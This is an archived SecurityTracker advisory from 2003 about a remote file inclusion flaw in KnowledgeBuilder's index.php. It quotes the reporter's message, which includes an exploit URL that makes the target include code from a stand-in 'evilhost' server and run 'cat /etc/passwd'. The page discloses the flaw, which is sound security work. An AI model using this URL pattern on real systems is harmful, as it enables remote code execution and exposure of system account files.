Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   


Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker

Category:   Application (Generic)  >   KnowledgeBuilder Vendors:   ActiveCampaign, Inc.
KnowledgeBuilder Include File Flaw Lets Remote Users Execute Arbitrary OS Commands
SecurityTracker Alert ID:  1008557
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 27 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   An include file vulnerability was reported in KnowledgeBuilder. A remote user can execute arbitrary operating system commands on the target system.

Zero X reported that the software does not validate the 'page' location variable for the 'index.php' script. A remote user can specify a remote location for the index.php file to cause the remote PHP file to be included and executed on the target system.

A demonstration exploit URL is provided:


Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system. The code and commands will run with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Date:  24 Dec 2003 13:45:22 -0000
Subject:  Remote Code Execution in Knowledge Builder.

Remote Code Execution in Knowledge Builder.

"Knowledge Builder" from allows to execute code.


Create the following file on your webserver:


And then type in the following URL:

http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat /etc/passwd

Zero X, member of and


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

Copyright 2015, LLC